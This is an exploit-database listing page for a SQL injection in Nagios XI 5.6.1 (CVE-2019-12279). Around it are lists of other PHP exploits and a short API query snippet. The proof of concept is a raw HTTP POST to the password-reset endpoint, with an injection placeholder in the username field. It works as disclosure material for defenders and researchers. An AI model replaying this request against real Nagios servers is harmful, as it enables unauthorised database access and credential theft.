"Nagios XI 5.6.1 - SQL injection"

Author

JameelNabbo

Platform

php

Release date

2019-05-23

Release Date	Title	Type	Platform	Author
2019-06-12	"FusionPBX 4.4.3 - Remote Command Execution"	webapps	php	"Dustin Cobb"
2019-06-11	"phpMyAdmin 4.8 - Cross-Site Request Forgery"	webapps	php	Riemann
2019-06-11	"WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution"	webapps	php	xulchibalraa
2019-06-10	"UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting"	webapps	php	Unk9vvN
2019-06-04	"IceWarp 10.4.4 - Local File Inclusion"	webapps	php	JameelNabbo
2019-06-03	"WordPress Plugin Form Maker 1.13.3 - SQL Injection"	webapps	php	"Daniele Scanu"
2019-06-03	"KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities"	webapps	php	SlidingWindow
2019-05-29	"pfSense 2.4.4-p3 (ACME Package 0.59_14) - Persistent Cross-Site Scripting"	webapps	php	"Chi Tran"
2019-05-24	"Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC"	webapps	php	"Todor Donev"
2019-05-23	"Nagios XI 5.6.1 - SQL injection"	webapps	php	JameelNabbo
2019-05-22	"Horde Webmail 5.2.22 - Multiple Vulnerabilities"	webapps	php	InfinitumIT
2019-05-21	"WordPress Plugin WPGraphQL 0.2.3 - Multiple Vulnerabilities"	webapps	php	"Simone Quatrini"
2019-05-21	"Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting"	webapps	php	"Dionach Ltd"
2019-05-23	"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)"	remote	php	Metasploit
2019-05-20	"eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution"	webapps	php	liquidsky
2019-05-20	"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)"	remote	php	Metasploit
2019-05-17	"Interspire Email Marketer 6.20 - 'surveys_submit.php' Remote Code Execution"	webapps	php	"numan türle"
2019-05-16	"DeepSound 1.0.4 - SQL Injection"	webapps	php	"Mehmet EMIROGLU"
2019-05-15	"Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting"	webapps	php	LiquidWorm
2019-05-15	"CommSy 8.6.5 - SQL injection"	webapps	php	"Jens Regel_ Schneider_ Wulf"
2019-05-14	"PasteShr 1.6 - Multiple SQL Injection"	webapps	php	"Mehmet EMIROGLU"
2019-05-14	"Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection"	webapps	php	"Julien Ahrens"
2019-05-14	"Sales ERP 8.1 - Multiple SQL Injection"	webapps	php	"Mehmet EMIROGLU"
2019-05-14	"PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)"	remote	php	AkkuS
2019-05-13	"OpenProject 5.0.0 - 8.3.1 - SQL Injection"	webapps	php	"SEC Consult"
2019-05-13	"XOOPS 2.5.9 - SQL Injection"	webapps	php	"felipe andrian"
2019-05-13	"SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)"	webapps	php	LiquidWorm
2019-05-13	"SOCA Access Control System 180612 - SQL Injection"	webapps	php	LiquidWorm
2019-05-13	"SOCA Access Control System 180612 - Information Disclosure"	webapps	php	LiquidWorm
2019-05-09	"Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting"	webapps	php	"Ibrahim Raafat"

Release Date	Title	Type	Platform	Author
2019-06-04	"IceWarp 10.4.4 - Local File Inclusion"	webapps	php	JameelNabbo
2019-05-27	"Deltek Maconomy 2.2.5 - Local File Inclusion"	webapps	multiple	JameelNabbo
2019-05-23	"Nagios XI 5.6.1 - SQL injection"	webapps	php	JameelNabbo
2019-03-04	"Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution"	webapps	hardware	JameelNabbo
2019-02-15	"Jinja2 2.10 - 'from_string' Server Side Template Injection"	webapps	python	JameelNabbo
2018-02-16	"Twig < 2.4.4 - Server Side Template Injection"	webapps	php	JameelNabbo

import requests

response = requests.get('https://www.nmmapper.com/api/exploitdetails/46910/?format=json')

                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46910/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46910/41354/nagios-xi-561-sql-injection/download/", "exploit_id": "46910", "exploit_description": "\"Nagios XI 5.6.1 - SQL injection\"", "exploit_date": "2019-05-23", "exploit_author": "JameelNabbo", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}

For full documentation follow the link above

Browse exploit DB API Browse

 
                 Download file
            
# Exploit Title: Nagiosxi username sql injection
# Date: 22/05/2019
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.nagios.com
# Software Link: https://www.nagios.com/products/nagios-xi/
# Version: xi-5.6.1
# Tested on: MacOSX
#CVE: CVE-2019-12279

POC:

POST /nagiosxi/login.php?forgotpass HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/nagiosxi/login.php?forgotpass
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Connection: close
Cookie: nagiosxi=iu78vcultg46f35fq7lfbv8tc6
Upgrade-Insecure-Requests: 1

page=%2Fnagiosxi%2Flogin.php&pageopt=resetpass&nsp=cb6ad70efd0cc0b36ff4fc1d67cd70fb96a7e06622d281acb8810aa65485b03b&username={SQL INJECTION}